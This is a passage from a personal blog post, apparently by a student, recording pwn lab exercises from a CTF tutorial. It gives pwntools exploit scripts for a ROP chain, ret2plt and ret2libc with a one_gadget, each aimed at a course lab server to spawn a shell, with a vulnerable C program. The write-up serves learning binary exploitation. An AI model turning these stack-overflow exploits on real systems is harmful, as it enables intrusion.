<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment">#io = process('./rop')</span></span><br><span class="line">io = remote(<span class="string">'isc.taiwan-te.ch'</span>,<span class="number">10004</span>)</span><br><span class="line"></span><br><span class="line">pop_rax = <span class="number">0x0000000000415294</span> <span class="comment"># pop rax ; ret</span></span><br><span class="line">pop_rdi = <span class="number">0x0000000000400686</span> <span class="comment"># pop rdi ; ret</span></span><br><span class="line">pop_rsi = <span class="number">0x0000000000410093</span> <span class="comment"># pop rsi ; ret</span></span><br><span class="line">pop_rdx = <span class="number">0x00000000004494b5</span> <span class="comment"># pop rdx ; ret</span></span><br><span class="line">mov_si2di = <span class="number">0x0000000000446c1b</span> <span class="comment"># mov qword ptr [rdi], rsi ; ret</span></span><br><span class="line">syscall = <span class="number">0x0000000000474a65</span> <span class="comment"># syscall ; ret</span></span><br><span class="line">bss = <span class="number">0x00000000006bb2e0</span> <span class="comment">#address of bss</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">io.recvuntil(<span class="string">';)\n'</span>)</span><br><span class="line"></span><br><span class="line">p = <span class="string">'A'</span> * <span class="number">24</span></span><br><span class="line">p += p64(pop_rdi)</span><br><span class="line">p += p64(bss)</span><br><span class="line">p += p64(pop_rsi)</span><br><span class="line">p += <span class="string">'/bin/sh\x00'</span></span><br><span class="line">p += p64(mov_si2di)</span><br><span class="line">p += p64(pop_rsi)</span><br><span class="line">p += p64(<span class="number">0</span>)</span><br><span class="line">p += p64(pop_rdx)</span><br><span class="line">p += p64(<span class="number">0</span>)</span><br><span class="line">p += p64(pop_rax)</span><br><span class="line">p += p64(<span class="number">0x3b</span>)</span><br><span class="line">p += p64(syscall)</span><br><span class="line">        </span><br><span class="line">io.send(p)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="然后是ret2plt-相当于把lab4和lab5的知识结合起来-当时想了挺久的-做题脑袋不太灵光-自己太笨了orz…-寻求一位师傅的帮助下后理清了思路"><a href="#然后是ret2plt-相当于把lab4和lab5的知识结合起来-当时想了挺久的-做题脑袋不太灵光-自己太笨了orz…-寻求一位师傅的帮助下后理清了思路" class="headerlink" title="然后是ret2plt,相当于把lab4和lab5的知识结合起来,当时想了挺久的,做题脑袋不太灵光(自己太笨了orz…,寻求一位师傅的帮助下后理清了思路"></a>然后是ret2plt,相当于把lab4和lab5的知识结合起来,当时想了挺久的,做题脑袋不太灵光(自己太笨了orz…,寻求一位师傅的帮助下后理清了思路</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">char</span> name[<span class="number">16</span>];</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  setvbuf(<span class="built_in">stdout</span>, <span class="number">0</span>, <span class="number">2</span>, <span class="number">0</span>);</span><br><span class="line">  setvbuf(<span class="built_in">stdin</span>, <span class="number">0</span>, <span class="number">2</span>, <span class="number">0</span>);</span><br><span class="line">  <span class="keyword">char</span> buf[<span class="number">16</span>];</span><br><span class="line">  system(<span class="string">"echo What is your name?"</span>);</span><br><span class="line">  read(<span class="number">0</span>, name, <span class="number">0x10</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Say something: "</span>);</span><br><span class="line">  read(<span class="number">0</span>, buf, <span class="number">0x40</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<ul>
<li>大体思路如图<br><img src="https://ae01.alicdn.com/kf/U5783b636ed50476c885132e243724807h.jpg" alt></li>
</ul>
<p>exp如下:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment">#sh = process('./ret2plt')</span></span><br><span class="line"><span class="comment">#context.log_level="debug"</span></span><br><span class="line">sh = remote(<span class="string">'isc.taiwan-te.ch'</span>, <span class="number">10005</span>)</span><br><span class="line"></span><br><span class="line">system = <span class="number">0x400520</span>   <span class="comment"># system</span></span><br><span class="line">pop_rdi = <span class="number">0x0000000000400733</span> <span class="comment"># pop rdi ; ret</span></span><br><span class="line">ret = <span class="number">0x00000000004004fe</span>    <span class="comment"># ret</span></span><br><span class="line">name =  <span class="number">0x601070</span>    <span class="comment"># &lt;name&gt;</span></span><br><span class="line"></span><br><span class="line">sh.recvuntil(<span class="string">'?'</span>)</span><br><span class="line">sh.sendline(<span class="string">'sh\x00'</span>)</span><br><span class="line"></span><br><span class="line">p = <span class="string">'a'</span> * <span class="number">0x18</span></span><br><span class="line">p += p64(pop_rdi)</span><br><span class="line">p += p64(name)</span><br><span class="line">p += p64(ret)   <span class="comment">#这个ret是本身程序的问题要加上</span></span><br><span class="line">p += p64(system)</span><br><span class="line">sh.recvuntil(<span class="string">": "</span>)</span><br><span class="line">sh.sendline(p)</span><br><span class="line"></span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="0x06-ret2libc"><a href="#0x06-ret2libc" class="headerlink" title="0x06 ret2libc"></a><em>0x06 ret2libc</em></h2><h3 id="ret2libc-即控制函数的执行-libc-中的函数，通常是返回至某个函数的-plt-处或者函数的具体位置-即函数对应的-got-表项的内容-。一般情况下，我们会选择执行-system-“-bin-sh”-，故而此时我们需要知道-system-函数的地址。"><a href="#ret2libc-即控制函数的执行-libc-中的函数，通常是返回至某个函数的-plt-处或者函数的具体位置-即函数对应的-got-表项的内容-。一般情况下，我们会选择执行-system-“-bin-sh”-，故而此时我们需要知道-system-函数的地址。" class="headerlink" title="ret2libc 即控制函数的执行 libc 中的函数，通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下，我们会选择执行 system(“/bin/sh”)，故而此时我们需要知道 system 函数的地址。"></a>ret2libc 即控制函数的执行 libc 中的函数，通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下，我们会选择执行 system(“/bin/sh”)，故而此时我们需要知道 system 函数的地址。</h3><h3 id="这个利用方法我主要是看CTF-WIKI和其他文章"><a href="#这个利用方法我主要是看CTF-WIKI和其他文章" class="headerlink" title="这个利用方法我主要是看CTF-WIKI和其他文章"></a>这个利用方法我主要是看CTF-WIKI和其他文章</h3><p><strong>强大的onegadget工具</strong></p>
<h3 id="就先放上exp"><a href="#就先放上exp" class="headerlink" title="就先放上exp:"></a>就先放上exp:</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">host = <span class="string">'isc.taiwan-te.ch'</span></span><br><span class="line">port = <span class="number">10006</span></span><br><span class="line"></span><br><span class="line">r = remote(host, port)</span><br><span class="line"></span><br><span class="line">put_got_addr = <span class="number">0x601018</span></span><br><span class="line">put_offset = <span class="number">0x809c0</span></span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">'hex: '</span>)</span><br><span class="line">r.send(hex(put_got_addr))</span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">'Content: '</span>)</span><br><span class="line">put_addr = int(r.recvuntil(<span class="string">'\n'</span>)[:<span class="number">-1</span>])</span><br><span class="line"></span><br><span class="line">libc_base = put_addr - put_offset</span><br><span class="line">one = <span class="number">0x4f322</span></span><br><span class="line">p = <span class="string">'a'</span> * <span class="number">0x38</span></span><br><span class="line">p += p64(libc_base + one)</span><br><span class="line">r.recvuntil(<span class="string">'messege: '</span>)</span><br><span class="line">r.send(p)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="0x07-总结"><a href="#0x07-总结" class="headerlink" title="0x07 总结"></a><em>0x07 总结</em></h2><h3 id="第一章就先到这-自己还是有很多基础知识不了解-还是要努力去学习-脚踏实地-不能心浮气躁"><a href="#第一章就先到这-自己还是有很多基础知识不了解-还是要努力去学习-脚踏实地-不能心浮气躁" class="headerlink" title="第一章就先到这,自己还是有很多基础知识不了解,还是要努力去学习,脚踏实地,不能心浮气躁.."></a>第一章就先到这,自己还是有很多基础知识不了解,还是要努力去学习,脚踏实地,不能心浮气躁..</h3><h1 id="Cheer-For-Yourself"><a href="#Cheer-For-Yourself" class="headerlink" title="Cheer For Yourself"></a><strong>Cheer For Yourself</strong></h1>
    </div>

    
    
    
        
      
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>晚来秋</li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://lhxhl.github.io/2020/03/14/pwn/" title="PWN">https://lhxhl.github.io/2020/03/14/pwn/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fa fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！</li>
</ul>
</div>

      

      <footer class="post-footer">
          
            
          
          <div class="post-tags">
            
              <a href="/tags/搬砖工/" rel="tag"># 搬砖工</a>
            
              <a href="/tags/ctf学习/" rel="tag"># ctf学习</a>
            
              <a href="/tags/pwn/" rel="tag"># pwn</a>
            
          </div>
        

        

          <div class="post-nav">
            <div class="post-nav-next post-nav-item">
              
                <a href="/2020/02/03/web/" rel="next" title="WEB">
                  <i class="fa fa-chevron-left"></i> WEB
                </a>
              
            </div>

            <span class="post-nav-divider"></span>

            <div class="post-nav-prev post-nav-item">
              
            </div>
          </div>
        
      </footer>
    
  </div>
  
  
  
  </article>

  </div>


          </div>
          

        </div>
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">
        
        
        
        
      

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#PWN-一"><span class="nav-number">1.</span> <span class="nav-text">PWN(一)</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#STACK-OVER-FLOW"><span class="nav-number">1.1.</span> <span class="nav-text">STACK OVER FLOW</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x00-Introduction"><span class="nav-number">1.2.</span> <span class="nav-text">0x00 Introduction</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#这是记录我自己学PWN的一些经历-也是做个总结-方便以后回顾"><span class="nav-number">1.2.1.</span> <span class="nav-text">这是记录我自己学PWN的一些经历,也是做个总结,方便以后回顾.</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#本章所用到的是NTUSTISC-Pwn-基础教程-有UP主从youtube上搬过来的"><span class="nav-number">1.2.2.</span> <span class="nav-text">本章所用到的是NTUSTISC - Pwn 基础教程,有UP主从youtube上搬过来的.</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#所用到LAB都在这里"><span class="nav-number">1.2.3.</span> <span class="nav-text">所用到LAB都在这里</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0X01-Prior-knowledge"><span class="nav-number">1.3.</span> <span class="nav-text">0X01 Prior knowledge</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Binary-Format"><span class="nav-number">1.3.1.</span> <span class="nav-text">Binary Format</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Calling-Convention"><span class="nav-number">1.3.2.</span> <span class="nav-text">Calling Convention</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Protection"><span class="nav-number">1.3.3.</span> <span class="nav-text">Protection</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Stack-Frame"><span class="nav-number">1.3.4.</span> <span class="nav-text">Stack Frame</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#还有就是一些工具的使用如IDA-pwntools-gdb-objdump等等"><span class="nav-number">1.3.5.</span> <span class="nav-text">还有就是一些工具的使用如IDA,pwntools,gdb,objdump等等..</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#网上资料很多-主要还是多用-孰能生巧"><span class="nav-number">1.3.6.</span> <span class="nav-text">网上资料很多,主要还是多用,孰能生巧</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#原理这些我都引用自CTF-WIKI"><span class="nav-number">1.3.7.</span> <span class="nav-text">原理这些我都引用自CTF-WIKI</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ROP-Return-Oriented-Programming-，其主要思想是在栈缓冲区溢出的基础上，利用程序中已有的小片段-gadgets-来改变某些寄存器或者变量的值，从而控制程序的执行流程。所谓-gadgets-就是以-ret-结尾的指令序列，通过这些指令序列，我们可以修改某些地址的内容，方便控制程序的执行流程。"><span class="nav-number">1.3.8.</span> <span class="nav-text">ROP(Return Oriented Programming)，其主要思想是在栈缓冲区溢出的基础上，利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值，从而控制程序的执行流程。所谓 gadgets 就是以 ret 结尾的指令序列，通过这些指令序列，我们可以修改某些地址的内容，方便控制程序的执行流程。</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-ret2text"><span class="nav-number">1.4.</span> <span class="nav-text">0x02 ret2text</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#LAB-1-这是最简单的Buffer-Overflow"><span class="nav-number">1.4.1.</span> <span class="nav-text">LAB 1 这是最简单的Buffer Overflow</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#exp如下"><span class="nav-number">1.4.2.</span> <span class="nav-text">exp如下:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#LAB-2-视频中没有给示范-只有思路-主要函数如下"><span class="nav-number">1.4.3.</span> <span class="nav-text">LAB 2 视频中没有给示范,只有思路,主要函数如下</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#这里需要考虑绕过strlen函数和allow两个点"><span class="nav-number">1.4.4.</span> <span class="nav-text">这里需要考虑绕过strlen函数和allow两个点</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-ret2shellcode"><span class="nav-number">1.5.</span> <span class="nav-text">0x03 ret2shellcode</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#LAB-3-学会利用pwntools生成shellcode"><span class="nav-number">1.5.1.</span> <span class="nav-text">LAB 3 学会利用pwntools生成shellcode</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#我们可以注意到-message是个Global-variables-因此IDA找到它的地址-往里写入shellcode"><span class="nav-number">1.5.2.</span> <span class="nav-text">我们可以注意到,message是个Global variables,因此IDA找到它的地址,往里写入shellcode.</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04-GOT-Hĳacking"><span class="nav-number">1.6.</span> <span class="nav-text">0x04 GOT Hĳacking</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#在这之前还需要明白"><span class="nav-number">1.6.1.</span> <span class="nav-text">在这之前还需要明白</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#这里需要好好理解原理-不然后面会很艰难-学pwn基础很重要-不能心急"><span class="nav-number">1.6.2.</span> <span class="nav-text">这里需要好好理解原理,不然后面会很艰难(学pwn基础很重要,不能心急)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#放上几篇参考文章"><span class="nav-number">1.6.3.</span> <span class="nav-text">放上几篇参考文章:</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x05-ROP"><span class="nav-number">1.7.</span> <span class="nav-text">0x05 ROP</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#ROP上面已经有解释过-这里在介绍下"><span class="nav-number">1.7.1.</span> <span class="nav-text">ROP上面已经有解释过,这里在介绍下</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#学会使用ROPgadget和grep指令搜索需要的代码"><span class="nav-number">1.7.2.</span> <span class="nav-text">学会使用ROPgadget和grep指令搜索需要的代码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#然后是ret2plt-相当于把lab4和lab5的知识结合起来-当时想了挺久的-做题脑袋不太灵光-自己太笨了orz…-寻求一位师傅的帮助下后理清了思路"><span class="nav-number">1.7.3.</span> <span class="nav-text">然后是ret2plt,相当于把lab4和lab5的知识结合起来,当时想了挺久的,做题脑袋不太灵光(自己太笨了orz…,寻求一位师傅的帮助下后理清了思路</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x06-ret2libc"><span class="nav-number">1.8.</span> <span class="nav-text">0x06 ret2libc</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#ret2libc-即控制函数的执行-libc-中的函数，通常是返回至某个函数的-plt-处或者函数的具体位置-即函数对应的-got-表项的内容-。一般情况下，我们会选择执行-system-“-bin-sh”-，故而此时我们需要知道-system-函数的地址。"><span class="nav-number">1.8.1.</span> <span class="nav-text">ret2libc 即控制函数的执行 libc 中的函数，通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下，我们会选择执行 system(“/bin/sh”)，故而此时我们需要知道 system 函数的地址。</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#这个利用方法我主要是看CTF-WIKI和其他文章"><span class="nav-number">1.8.2.</span> <span class="nav-text">这个利用方法我主要是看CTF-WIKI和其他文章</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#就先放上exp"><span class="nav-number">1.8.3.</span> <span class="nav-text">就先放上exp:</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x07-总结"><span class="nav-number">1.9.</span> <span class="nav-text">0x07 总结</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#第一章就先到这-自己还是有很多基础知识不了解-还是要努力去学习-脚踏实地-不能心浮气躁"><span class="nav-number">1.9.1.</span> <span class="nav-text">第一章就先到这,自己还是有很多基础知识不了解,还是要努力去学习,脚踏实地,不能心浮气躁..</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Cheer-For-Yourself"><span class="nav-number">2.</span> <span class="nav-text">Cheer For Yourself</span></a></li></ol></div>
        
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image"
      src="/images/01.jpg"
      alt="晚来秋">
  <p class="site-author-name" itemprop="name">晚来秋</p>
  <div class="site-description" itemprop="description">高中生/CTFer/二进制萌新</div>
</div>
  <nav class="site-state motion-element">
      <div class="site-state-item site-state-posts">
        
          <a href="/archives/">
        
          <span class="site-state-item-count">9</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
    
      
      
      <div class="site-state-item site-state-categories">
        
          
            <a href="/categories/">
          
        
        
        
          
        
          
        
          
        
          
        
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">分类</span>
        </a>
      </div>
    
      
      
      <div class="site-state-item site-state-tags">
        
        
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">标签</span>
        
      </div>
    
  </nav>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love" id="animate">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">晚来秋</span>
</div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item-icon">
      <i class="fa fa-user"></i>
    </span>
    <span class="site-uv" title="总访客量">
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
  
    <span class="post-meta-divider">|</span>
  
    <span class="post-meta-item-icon">
      <i class="fa fa-eye"></i>
    </span>
    <span class="site-pv" title="总访问量">
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
  
</div>












        
      </div>
    </footer>
  </div>

  


    
  
  <script color='0,0,0' opacity='0.5' zIndex='-1' count='150' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script size="300" alpha="0.6" zIndex="-1" src="/lib/canvas-ribbon/canvas-ribbon.js"></script>
  <script src="/lib/anime.min.js?v=3.1.0"></script>
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
<script src="/js/utils.js?v=7.3.0"></script><script src="/js/motion.js?v=7.3.0"></script>
<script src="/js/schemes/pisces.js?v=7.3.0"></script>

<script src="/js/next-boot.js?v=7.3.0"></script>



  





















  

  

  

  
<script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js">
</script>

</body>
</html>
